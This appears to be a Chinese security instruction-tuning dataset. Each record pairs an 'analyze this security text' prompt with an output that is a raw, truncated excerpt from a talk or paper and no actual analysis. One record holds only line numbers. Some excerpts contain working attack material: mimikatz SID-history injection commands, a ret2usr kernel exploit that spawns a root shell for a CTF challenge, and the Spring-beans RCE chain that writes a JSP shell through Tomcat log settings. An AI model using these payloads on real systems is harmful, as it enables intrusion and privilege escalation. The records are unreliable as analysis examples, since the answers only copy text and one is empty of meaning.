{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMicroservices and FaaS for Offensive Security Ryan Baxendale $ whoami Ryan Baxendale Penetration Tester Centurion Information Security Pte Ltd - www.centurioninfosec.sg Singapore twitter.com/ryancancomputer github.com/ryanbaxendale linkedin.com/in/ryanbaxendale Servers are dead... Serverless Jan 2015 - AWS Lambda Preview open to all AWS Customers The stack Source: https://intl.aliyun.com/forum/read-499 Microservices Code Real-time File Processing https://aws.amazon.com/lambda/ Real-time Stream Processing https://aws.amazon.com/lambda/ Scale https://github.com/airbnb/streamalert StreamAlert is a serverless, realtime data analysis framework which empowers you to ingest, analyze, and alert on data from any environment, using datasources and alerting logic you define. https://github.com/0x4D31/honeyLambda honeyλ - a simple serverless application designed to create and monitor URL {honey}tokens, on top of AWS Lambda and Amazon API Gateway https://github.com/goadapp/goad Goad is an AWS Lambda powered, highly distributed, load testing tool built in Go https://github.com/davbo/lambda-csp-report-uri Simple python application which runs on AWS Lambda and writes CSP reports into S3 for later processing https://github.com/therefromhere/csp_lambda AWS Lambda function to store Content Security Policy reports in ElasticSearch Automate https://github.com/marekq/aws-lambda-firewall Create temporary security groups on your EC2 instances through a simple API call. In addition, audit your security groups easily by the use of automated reports written to S3. https://github.com/ilijamt/lambda_security_grou p_manager Auto managing your AWS security groups with Lambda https://github.com/johnmccuk/cloudflare-ip-security-gr oup-update Lambda function to retrieve Cloudflare's IP address list and update the specified security group AWS WAF Automation https://aws.amazon.com/answers/ security/aws-waf-security-automat ions/ Parse application logs and trigger WAF rules Honeypot Log parsing (db scr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n美团 APT检测设备的扩展研究 演讲人朱学文Ju Zhu 2019 团队介绍 朱学文Ju Zhu 美团/高级安全研究员 9+年的安全研究经验 7+年主要从事高级威胁的研究包括0DaynDay和漏洞挖掘 一直致力于使用自动化系统来Hunt野外的高级威胁 多次获得CVE且受到GoogleAppleFacebook等厂商的致谢 多次作为Speaker受邀参加BlackHatCodeBlueCSS等国内外的顶级安全会议 郭梦圆Mabel Guo 上海交通大学/美团实习安全研究员 上海交通大学在读硕士 研究生阶段致力于视频隐写/隐写分析研究 擅长iOS逆向以及虚拟化技术 PART 01 设备选型对比 目录 CONTENTS PART 02 解决方案对比 PART 03 iOS动态沙箱 PART 04 一些实践 01 02 03 04 PART 01 业界主流APT检测设备的选型对比 业界主流APT检测设备的选型对比 概述 平台支持性 文件类型支持性 内网接入设备类型统计 BYODBring Your Own Device 业界主流APT检测设备的选型对比 平台支持性 Windows MacOS iOS Android 其它 厂商1      厂商2      厂商3      Win7Win10 32位64位 自定义导入 业界主流APT检测设备的选型对比 文件类型支持性 PE Office PDF Mach-O plist APK 厂商1       厂商2       厂商3       Mach-O <- 静态分析 plistiOS RansomwareDeath Profile PART 02 可参考的解决方案对比 可参考的解决方案对比 动态沙箱技术解决方案对比 MacOS iOSAndroid 动态沙箱技术解决方案对比 MacOS iOS Android 可参考的动态沙箱 Darling 或 Cuckoo Sandbox Corellium Anbox 或 Cuckoo Droid 使用方式云或本地 本地 云 本地 开源 是 否 是 实现成本 中 极高 中 MacOS 阶梯式部署 Darling--大部分指标 Cuckoo Sandbox--剩下少部分 PART 03 iOS动态沙箱蜜罐 iOS动态沙箱蜜罐 总体架构流程 轻量级虚拟化设计 实现部署 总体架构流程 针对Mach-O 考虑攻击面影响面 总体架构流程 针对plist 类似Death Profile的攻击 轻量级虚拟化设计 API重定向 Loader & Run Mach-O Foundation  libobjc.so libxml2.so libdispatch.so  libc.so libc++abi.so libc++.so  QemuArm v7 DockerAarch 64 LinuxAarch 64 HardwareAarch 64 轻量级虚拟化设计 简单运行效果 Segment数据映射到虚拟内存 slide + text_vm_addr TEXT DATA LLVM LINKEDIT  Loader & Run VM Protection值 -> 虚拟内存VMP属性 导入相关依赖库 模拟实现 比如Foundation.framework 运行 找到入口地址比如main函数 Load Commands--LC_MAIN 绝对地址 = 入口地址 + slide + text_vm_addr 地址Rebase数据修正 Lazy Symbol PointerCFString 原数据Pointer 新数据Pointer Lazy Symbol Pointer 0x100007F9C -> slide + 0x100007F9C CFString 0x100007FA8 -> slide + 0x100007FA8 地址API重定向 Lazy Symbol Pointer数据 <- 模拟实现函数地址 原地址 新地址 NSLog slide + 0x100007F9C -> NSLog@libFoundatio n.so API重定向流程 完整运行流程 回调流程 部署 更好适配 ODMOriginal Design Manufacturer PART 04 一些实践 谢谢观看 演讲人朱学文Ju Zhu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport os import SocketServer import base64 as b64 import hashlib from Crypto.Util import number from Crypto import Random from Crypto.PublicKey.pubkey import * import datetime import calendar from schnorr import * MSGLENGTH = 40000 HASHLENGTH = 16 FLAG = open(\"flag\",\"r\").read() PORT_NUM = 20014 def digitalize(m): return int(m.encode('hex'), 16) class HandleCheckin(SocketServer.StreamRequestHandler): def handle(self): Random.atfork() req = self.request proof = b64.b64encode(os.urandom(12)) req.sendall( \"Please provide your proof of work, a sha1 sum ending in 16 bit's set to 0, it must be of length %d bytes, starting with %s\\n\" % ( len(proof) + 5, proof)) test = req.recv(21) ha = hashlib.sha1() ha.update(test) if (test[0:16] != proof or ord(ha.digest()[-1]) != 0 or ord(ha.digest()[-2]) != 0): # or ord(ha.digest()[-3]) != 0 or ord(ha.digest()[-4]) != 0): req.sendall(\"Check failed\") req.close() return req.sendall(\"Generating keys...\\n\") sk, pk = generate_keys() balance = 0 while True: req.sendall(\"Please tell us your public key:\") msg = self.rfile.readline().strip().decode('base64') if len(msg) < 6 or len(msg) > MSGLENGTH: req.sendall(\"what are you doing?\") req.close() return userPk = (int(msg.split(',')[0]), int(msg.split(',')[1])) req.sendall('''User logged in. [Beep] Please select your options: 1. Deposit a coin into your account, you can sign a message 'DEPOSIT' and send us the signature. 2. Withdraw a coin from your account, you need to provide us a message 'WITHDRAW' signed by both of you and our RESPECTED BANK MANAGER. 3. Find one of our customer support representative to assist you. Our working hour is 9:00 am to 5:00 pm every %s! Thank you for being our loyal customer and your satisfaction is our first priority! ''' % calendar.day_name[(datetime.datetime.today() + datetime.timedelta(days=1)).weekday()]) msg = self.rfile.readline().strip().decode('base64') if msg[0] == '1': req.sendall(\"Please send us your signature\") msg = self.rfile.readline().strip().decode(", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nautocoinapp 0x00 autocoin appapp IOSJSBOX 0x01 1. autocoinvpshttp 2. VPShttp 3. jsboxAPPjshttp vpshttpnginxhttpvpshttpflask 0x02 VPShttp flaskautocoin jsbox from flask import Flask from flask import request from flask import jsonify import json app = Flask(__name__) ## @app.route('/getconf',methods=['GET']) def getconf(): if request.method == 'GET': f = open('autocoin.conf','r') conf = f.readline() return jsonify(conf) ## post @app.route('/setconf',methods=['POST']) def setconf(): if request.method == 'POST': f = open('autocoin.conf','w') json_data = request.json json_data=json.dumps(json_data) f.write(json_data) f.close return 'OK' if __name__ == '__main__': app.run(host='172.17.0.1', port=5000, debug=True) ## docker0iplocalhost flask vpsnginxurl flask dockernginxnginx events { worker_connections 1024; } http { server { listen 80; server_name localhost; location /fdafewfdsfagdfdsa/{ proxy_pass http://172.17.0.1:5000/ } } } urlflask 0x03 jsbox jsboxappjsapiappapp api jsboxiosjsboxapi postget var conf = { threhold: 0.003, switch: true, oneprice: 900 }; $ui.render({ views: [ { type: \"label\", props: { id: \"switchlabel\", text: \"\", align: $align.center }, layout: function(make){ make.top.equalTo(10); } } , { type: \"switch\", props: { on: true }, layout: function(make){ make.top.equalTo($(\"switchlabel\").bottom).offset(10); }, events:{ changed:function(sender){ conf.switch = sender.on; } } }, { type: \"label\", props: { id: \"onepricelabel\", text: \"\", align: $align.center }, layout: function(make){ make.top.equalTo($(\"switch\").bottom).offset(10); }, } , { type: \"input\", props: { id:\"onepriceinput\", type: $kbType.search, darkKeyboard: true, text: conf.oneprice, }, layout: function(make){ make.top.equalTo($(\"onepricelabel\").bottom).offset(10); make.width.equalTo(150); }, events:{ returned: function(sender){ conf.oneprice = sender.text; $ui.toast(conf.oneprice); } } }, { type: \"label\", props: { id: \"threholdlabel\", text: \"\", align: $align.center }, layout: function(make){ make.to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPrisma by Palo Alto Networks | Kubernetes Privilege Escalation: Excessive Permissions in Popular Platforms | White Paper 1 Kubernetes Privilege Escalation: Excessive Permissions in Popular Platforms 2 Prisma by Palo Alto Networks | Kubernetes Privilege Escalation: Excessive Permissions in Popular Platforms | White Paper Table of Contents Foreword . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Executive Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 RBAC Misconfigurations are Easy to Miss . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Powerful Permissions are Widespread . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Excessive Permissions Lead to Impactful Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 RBAC Misconfigurations are Solvable . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .5 Role-Based Access Control 101 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 Classifying Powerful Kubernetes Permissions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Acquire Tokens . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .8 Remote Code Execution . . . . . . . . . . . . . . . . . . . . ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVLAN hopping, ARP poisoning and Man-In-The-Middle Attacks in Virtualized Environments Ronny L. Bull, Jeanna N. Matthews, Kaitlin A. Trumbull Clarkson University {bullrl, jnm}@clarkson.edu Utica College {rlbull, katrumbu}@utica.edu AbstractCloud service providers offer their customers the ability to deploy virtual machines in a multi-tenant environment. These virtual machines are typically connected to the physical network via a virtualized network configuration. This could be as simple as a bridged interface to each virtual machine or as complicated as a virtual switch providing more robust networking features such as VLANs, QoS, and monitoring. At DEF CON 23, we presented how attacks known to be successful on physical switches apply to their virtualized counterparts. Here, we present new results demonstrating successful attacks on more complicated virtual switch configurations such as VLANs. In particular, we demonstrate VLAN hopping, ARP poisoning and Man-in-the- Middle attacks across every major hypervisor platform. We have added more hypervisor environments and virtual switch configurations since our last disclosure, and have included results of attacks originating from the physical network as well as attacks originating in the virtual network. KeywordsVirtualization, Networking, Network Security, Cloud Security, Layer 2 Attacks. I. INTRODUCTION With the growing popularity of Internet-based cloud service providers, many businesses are turning to these services to host their mission critical data and applications. Cloud customers often deploy virtual machines to shared, remote, physical com- puting resources. Virtual machines running in cloud capacity are connected to the physical network via a virtualized network within the host environment. Typically, virtualized hosting environments will utilize either a bridged network interface or a virtualized switch such as Open vSwitch[1], [2] for Xen and KVM based environments, or for VMware vSphere and Microsoft Hyper-V, t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-kerberos协议原理 参考文章 Kerberos协议的组成部分 第一次通信 第二次通信 第三次通信 Kerberos协议中的攻击分类 S-kerberos协议原理 参考文章 详解kerberos认证原理 内网渗透测试Kerberos 协议& Kerberos 认证原理 学习过程主要是参考的第一篇文章作者将认证的三个流程讲述的非常清楚只不过中间有细微的错误和笔误所 以参考第二篇文章进行改正 Kerberos协议的组成部分 客户端(Client)发送请求的一方 服务端(Server)接收请求的一方 密钥分发中心(Key Distribution CenterKDC)密钥分发中心默认安装在域控里包括AS和TGS两部分 认证服务器(Authentication ServerAS)认证服务器用于KDC对Client认证生成TGT票据 票据授予服务器(Ticket Granting ServerTGS)票据授予服务器用于KDC向Client和Server的临时密钥 活动目录(Active DirectoryAD)活动目录简称AD用于存储用户用户组域相关的信息 特权属证书(Privilege Attribute CertificatePAC)PAC包含客户端的权限信息如SID及所在的组 第一次通信 为了获得能够用来访问服务端服务的票据客户端首先需要来到KDC获得服务授予票据ST(Server Ticket)由于客户端 是第一次访问KDC此时KDC也不确定该客户端的身份所以第一次通信的目的为KDC认证客户端身份确认客户端是 一个可靠且拥有访问KDC权限的客户端过程如下 1. 域内某个客户端要访问域内某个服务于是输入用户名和密码此时客户端本机的Kerberos服务会向KDC的AS认证服务发送 一个AS_REQ认证请求请求的凭据是使用Client的哈希值NTLM-Hash加密的时间戳以及Client-infoServer-info等数 据以及一些其他信息 2. KDC当中的AS(Authentication Server)接收请求后去活动目录(AD)中根据用户名查找是否存在该用户如果存在用户则取出改用 户的NTLM-Hash并对AS_REQ请求中加密的时间戳进行解密如果解密成功则证明客户端提供的密码正确如果时间戳在 五分钟之内则预认证成功 3. 反之如果不存在该用户则预认证失败如果认证成功AS会返回响应(AS_REP)给客户端其中包含两部分内容 第一部分内容称为TGT(Ticket Granting Ticket票据授予票据)客户端需要使用TGT去KDC中的TGS(票据授予中心)获取 访问网络服务所需的ST(Server Ticket服务授予票据)TGT中包含的内容有PACClient-info当前时间戳客户端 即将访问的TGS的NameTGT的有效时间以及用于Client和TGS之间通信的密钥Session_key(Client- TGS_SessionKeyCT_SK)整个TGT使用KDC的一个特定账户的NTLM-Hash进行加密这个特定的账户就是域控生成时 自动生成的Krbtgt用户 第二部分内容使用从AD中查询的客户端的NTLM-Hash进行加密内容包括客户端即将访问的TGS的NameTGT的有效时 间一个当前时间戳以及生成的CT_SK密钥这一部分的加密时客户端的哈希所以客户端获取响应之后可以将这一 部分数据进行解密然后本地缓存此TGT和原始的CT_SK密钥 至此第一次通信完成 第二次通信 此时的客户端收到了来自KDC(其实是AS)的响应并获取到了其中的两部分内容客户端会用自己的NTLM-Hash将第 二部分内容进行解密分别获得时间戳自己将要访问的TGS的信息和用于与TGS通信时的密钥CT_SK首先他会根 据时间戳判断该时间戳与自己发送请求时的时间之间的差值是否大于5分钟如果大于五分钟则认为该AS是伪造的 认证至此失败如果时间戳合理客户端便准备向TGS发起请求其次请求的主要目的是为了获取能够访问目标网络 服务的ST(Server Ticket) 在第二次通信请求中客户端将携带三部分内容交给KDC中的TGS第二次通信过程具体如 下所述 客户端行为 1. 客户端使用CT_SK加密时间戳Client-info作为第一部分信息发送给TGS 2. 客户端将自己想要访问的Server服务以明文的方式发送给KDC 3. 客户端将TGT作为第二部分内容发送给TGSTGT的内容因为使用的是Krbtgt用户的NTLM-Hash加密客户端无法解开所以 原封不动发送 4. 两部分组成的请求被称为TGS_REQ TGS行为 1. 此时KDC中的TGS收到了来自客户端的请求他首先根据客户端明文传输过来的Server服务IP查看当前kerberos系统中是否 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1134-005-win-SID历史记录注入 ## 来自ATT&CK的描述 Windows安全标识符SID是标识用户或组帐户的唯一值Windows安全在安全描述符和访问令牌中都使用SID帐户可以在SID历史Active Directory属性保留其他SID 从而允许域之间可互操作的帐户迁移例如SID历史中的所有值都包含在访问令牌中 攻击者可以使用此机制进行特权升级借助域管理员或同等权限权限可以将收集的或众所周知的SID值插入SID历史记录中以模拟任意用户/组例如企业管理员通过横向移动技术例如[远程服务](https://attack.mitre.org/techniques/T1021)[Windows Admin共享](https://attack.mitre.org/techniques/T1077)或[Windows远程管理](https://attack.mitre.org/techniques/T1028)此操作可能导致对本地资源的访问或对原本无法访问的域的访问 ## 测试案例 测试工具可以是Empire也可以是mimikatz - 如果在域控制器上[Empire](https://attack.mitre.org/software/S0363)可以向用户添加SID历史记录 - [Mimikatz](https://attack.mitre.org/software/S0002)的`MISC::AddSid`模块可以将任何SID或用户/组帐户附加到用户的SID历史记录中[Mimikatz](https://attack.mitre.org/software/S0002)还利用[SID历史记录注入](https://attack.mitre.org/techniques/T1178)来扩展其他组件的范围例如生成的Kerberos Golden Ticket和DCSync超出单个域 Mimikatz支持SID历史注入到任何用户帐户需要域管理员或等效的权限 **注意 ADDSID已移至2.1版本分支中的SID模块** ```dos mimikatz \"privilege::debug\" \"sid::patch\" \"sid::add /new:administrator /sam:abcc\" \"exit\" ``` ```dos mimikatz \"privilege::debug\" \"sid::patch\" \"sid::clear /sam:abcc\" \"exit\" 清除SID历史记录注入 ``` ## 检测日志 windows安全日志47664765 ## 测试复现 暂无具体实例可参考上述实例命令 ```dos mimikatz \"privilege::debug\" \"sid::patch\" \"sid::add /new:administrator /sam:abcc\" \"exit\" ``` ## 测试留痕 暂无**注意事项**47664765仅限域控主机是Windows server 2016及win10以上会产生此事件 ## 检测规则/思路 ### sigma规则 ```yml title: Windows SID历史记录创建域控权限后门 description: 域环境测试 references: https://adsecurity.org/?p=1772 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection: EventID: - 4766 #尝试将SID历史记录添加到帐户失败 - 4765 #已将 SID 历史记录添加到帐户 condition: selection level: medium ``` 注意此检测规则的适用范围Windows10Windows Server 2016此事件在将SID历史记录添加到帐户时生成 ### 建议 检测特征未经实际测试谨慎使用 ## 参考推荐 MITRE-ATT&CK-T1134-005 <https://attack.mitre.org/techniques/T1134/005/> 域渗透-域维权 <https://uknowsec.cn/posts/notes/域渗透-域维权.html> 如何利用SID History创建域控权限后门 <https://www.4hou.com/penetration/5476.html>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ret2usr已过时 ## 概述 **在未开启SMAP/SMEP保护的情况下**用户空间无法访问内核空间的数据但是内核空间可以访问/执行用户空间的数据因此 `ret2usr` 这种攻击手法应运而生通过 kernel ROP 以内核的 ring 0 权限执行用户空间的代码以完成提权 通常 CTF 中的 ret2usr 还是以执行```commit_creds(prepare_kernel_cred(NULL))```进行提权为主要的攻击手法不过相比起构造冗长的ROP chainret2usr 只需我们要提前在用户态程序构造好对应的函数指针获取相应函数地址后直接 ret 回到用户空间执行即可  对于开启了```SMAP/SMEP保护```的 kernel 而言**内核空间尝试直接访问用户空间会引起 kernel panic**我们将在下篇讲述其绕过方式 ## 例题2018 强网杯 - core 具体的这里就不再重复分析了由于其未开启 smap/smep 保护故可以考虑在**用户地址空间中构造好对应的函数指针后直接 ret2usr 以提权**我们只需要将代码稍加修改即可 ```C #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #define POP_RDI_RET 0xffffffff81000b2f #define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a #define POP_RDX_RET 0xffffffff810a0f49 #define POP_RCX_RET 0xffffffff81021e53 #define SWAPGS_POPFQ_RET 0xffffffff81a012da #define IRETQ 0xffffffff813eb448 size_t commit_creds = NULL, prepare_kernel_cred = NULL; size_t user_cs, user_ss, user_rflags, user_sp; void saveStatus() { __asm__(\"mov user_cs, cs;\" \"mov user_ss, ss;\" \"mov user_sp, rsp;\" \"pushf;\" \"pop user_rflags;\" ); printf(\"\\033[34m\\033[1m[*] Status has been saved.\\033[0m\\n\"); } void getRootPrivilige(void) { void * (*prepare_kernel_cred_ptr)(void *) = prepare_kernel_cred; int (*commit_creds_ptr)(void *) = commit_creds; (*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL)); } void getRootShell(void) { if(getuid()) { printf(\"\\033[31m\\033[1m[x] Failed to get the root!\\033[0m\\n\"); exit(-1); } printf(\"\\033[32m\\033[1m[+] Successful to get the root. Execve root shell now...\\033[0m\\n\"); system(\"/bin/sh\"); } void coreRead(int fd, char * buf) { ioctl(fd, 0x6677889B, buf); } void setOffValue(int fd, size_t off) { ioctl(fd, 0x6677889C, off); } void coreCopyFunc(int fd, size_t nbytes) { ioctl(fd, 0x6677889A, nbytes); } int main(int argc, char ** argv) { printf(\"\\033[34m\\033[1m[*] Start to exploit...\\033[0m\\n\"); saveStatus(); int fd = open(\"/proc/core\", 2); if(fd <0) { printf(\"\\033[31m\\033[1m[x] Failed to open the file: /proc/core !", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1105-win-命令提示符网络链接 ## 来自ATT&CK的描述 攻击者可能会将工具或其他文件从外部系统转移到被攻陷的环境中可以通过命令控制通道从外部攻击者控制的系统中复制文件以便将工具带入被攻陷的网络环境中或通过与另一个工具如FTP的替代协议复制文件文件也可以在Mac和Linux上使用scprsync和sftp等本机工具进行复制 ## 测试案例 识别cmd.exe建立网络连接攻击者可能滥用cmd.exe从远程URL下载或执行恶意软件 参考文章[渗透技巧通过cmd上传文件的N种方法](https://www.secpulse.com/archives/44450.html) ## 检测日志 windows安全日志 ## 测试复现 暂无 ## 测试留痕 暂无仅提供检测规则相关的日志示例 windows server 2016/win10 ```yml The Windows Filtering Platform has allowed a connection. Application Information: Process ID: 1752 Application Name: \\device\\harddiskvolume1\\windows\\system32\\dns.exe Network Information: Direction: Inbound Source Address: 10.45.45.103 Source Port: 53 Destination Address: 10.45.45.103 Destination Port: 50146 Protocol: 17 Filter Information: Filter Run-Time ID: 5 Layer Name: Receive/Accept Layer Run-Time ID: 44 ``` ## 检测规则/思路 ### sigma规则 ```yml title: 检测命令提示符网络链接 description: 通过windows日志命令检测提示符网络链接 tags: T1105 status: experimental references: - https://www.elastic.co/guide/en/siem/guide/current/command-prompt-network-connection.html#command-prompt-network-connection logsource: product: windows service: security detection: selection1: EventID: 5156 Process.name: 'cmd.exe' #Application Name selection2: Destination Address: - 10.0.0.0/8 - 172.16.0.0/12 - 192.168.0.0/16 condition: selection1 and not selection2 level: low ``` ### Elastic rule query ```yml process.name:cmd.exe and event.action:\"Network connection detected (rule: NetworkConnect)\" and not destination.ip:(10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) ``` ### 建议 低版本操作系统无法记录命令行参数及子父进程建议通过Sysmon进行监控 ## 参考推荐 MITRE-ATT&CK-T1105 <https://attack.mitre.org/techniques/T1105> 检测命令提示符网络链接 <https://www.elastic.co/guide/en/siem/guide/current/command-prompt-network-connection.html#command-prompt-network-connection>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n某硬件设备漏洞挖掘之路-Web选手初入\"二进 制\" Author: Yuanhai 遵守相关法律法规,本文不会带有任何厂商标识 0x01:前言 很早之前就有打算开始往二进制方向发展,但由于基础较差,需要花费大 量时间从0开始学习阅读其他师傅所写的文章受益良多最有印象的 就是忍者师傅所写的web选手如何快速卷入二进制世界简单的二 进制应用在IDA的伪代码状态下与日常的WEB应用审计流程基本一致 下面就分享一篇个人初学二进制的挖掘实践 0x02:正文 此次挖掘的目标系统是一个硬件设备(Web应用网关),通过官方服务中心 拿到了更新的固件包(.BIN文件)然后使用Binwalk对固件进行提取 python -m binwalk -Me ****.bin 这里使用的是windows环境下的命令 提取出来的文件会放在当前目录下以_(文件名)开头的新建文件夹中 在某个目录下发现了一个 .cpio 文件,大小为 164MB ,( cpio 也属于一种 压缩文件) 在windows下可以使用 7-zip 解压其中的文件 看见etc,dev等目录大概就明白了这是Unix系统文件 根据网关默认的页面查找到了Web程序所在的目录 此目录下仅有一些html页面,以及一些静态资源文件并没有功能处理 文件 查看相关配置文件,该网关应用使用 lighttpd + FastCGI 环境搭建 所有请求都交给 main_req 文件进行处理程序根目录 为 /var/local/web/htdocs 找到此文件,发现是一个系统执行文件 将其拖入IDA中由于不太清楚程序架构,搜索带有Login字符的相关处 理方法,使用F5查看伪代码根据前端传入的参数进行对比确定最终 的处理方法 前端传递参数只有 user_name , password , language 三个参数 与 login_req_proc 方法逻辑相同 到了这里基本流程就和Web中代码审计一致了.相比java中的获取请求 参数方法 request.getParameter 在图中一眼就可以看出程序使用 http_parameter_get 获取http协议提交过来的数据 if ( http_parameter_get(\"user_name\", &src)//获取参数user_name赋 值给src || http_parameter_getint(\"language\", &v23)//获取int类型的参 数language赋值给v23 || http_parameter_get(\"password\", &v24)//获取password参数赋 值给v24 || v23 >= 2 ) {如果上文有一个参数为空,且v23(language的值大于或等于2时) resultpage_redirect(\"/login.html\", &unk_4198F8, &unk_4198F8); //直接重定向到login.html并返回200 return 200; } 根据以上流程查找存在使用 http_parameter_get 的方法,确定 sink 在IDA中,单击需要查找的方法,使用快捷键X 依次审计存在使用 http_parameter_get 的事件方法 通过审计发现并没有一些调用敏感函数的利用点 比较疑惑在审计中发现存在调用的方法只有少数,正常的应用程序应该 不只这么点功能 继续分析,在 xxx_server() 方法中发现了一些其他内容 应用在启动时,会加载files下的一些模块 而模块中的_display.xml文件中声明了功能路径以及处理方法 使用 parserMapping对xml中的内容进行处理 如: <display> <disp_url>version_save</disp_url> <template>download.xml</template> <user_file>system.so</user_file> <pre_transform>save_pre_translate</pre_transform> <post_transform>save_post_translate</post_transform> <transform>save_translate_value</transform> </display> disp_url 为该方法的请求路径, template 为返回的响应模板, user_file 为方法所在的程序函数库, transform 为处理路径请求的方法可以单独 为不同的请求设置不同的处理方法 在了解相关程序结构后,后续挖掘就更加方便了 对每一个模块中程序函数库进行审计分析最终在某一处发现了存在调 用 system() 且参数可控造成命令执行   方法中,使", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSpring-beans RCE漏洞分析 1  Spring-beans RCE漏洞分析 说明 要求条件 JDK9及其以上版本 使了Spring-beans包 使了Spring参数绑定 Spring参数绑定使的是基本参数类型例如般的POJO即可 测试环境 https://github.com/p1n93r/spring-rce-war 漏洞分析 Spring参数绑定不过多介绍可百度其基本使式就是利 . 的形式给参数进赋值实际赋值过程会使反射调参 数的 getter or setter  这个漏洞刚爆出来的时候我下意思认为是个垃圾洞因为我觉得需要使的参数内存在个Class类型的属性没有哪个傻逼开 发会在POJO中使这个属性但是当我认真跟下来的时候发现事情没这么简单 例如我需要绑定的参数的数据结构如下就是个很简单的POJO /** * @author : p1n93r * @date : 2022/3/29 17:34 */ @Setter @Getter public class EvalBean { public EvalBean() throws ClassNotFoundException { System.out.println(\"[+] 调了EvalBean.EvalBean\"); } public String name; public CommonBean commonBean; public String getName() { System.out.println(\"[+] 调了EvalBean.getName\"); Spring-beans RCE漏洞分析 2 return name; } public void setName(String name) { System.out.println(\"[+] 调了EvalBean.setName\"); this.name = name; } public CommonBean getCommonBean() { System.out.println(\"[+] 调了EvalBean.getCommonBean\"); return commonBean; } public void setCommonBean(CommonBean commonBean) { System.out.println(\"[+] 调了EvalBean.setCommonBean\"); this.commonBean = commonBean; } } 我的Controller写法如下也是很正常的写法 @RequestMapping(\"/index\") public void index(EvalBean evalBean, Model model){ System.out.println(\"=================\"); System.out.println(evalBean); System.out.println(\"=================\"); } 于是我开始跟参数绑定的整个流程当我跟到如下调位置的时候我愣住了 当我查看这个 cache 的时候我惊呆了为啥这会有个 class 属性缓存 Spring-beans RCE漏洞分析 3 看到这我就知道我意识错了这不是个垃圾洞真的是个核弹级别的漏洞现在明了我们很简单的就可以获取到 class 对 象那剩下的就是利这个 class 对象构造利链了前较简单的式就是修改Tomcat的志配置向志中写shell条 完整的利链如下 class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%66%75%63%6b%7d%69 class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp class.module.classLoader.resources.context.parent.pipeline.first.directory=%48%3a%5c%6d%79%4a%61%76%61%43%6f%64%65%5c%73%74%75%70%69%64%52%7 class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= 看利链就知道是个很简单的修改Tomcat志配置利志写shell的法", "category": "text_analysis", "source": "security_papers"}
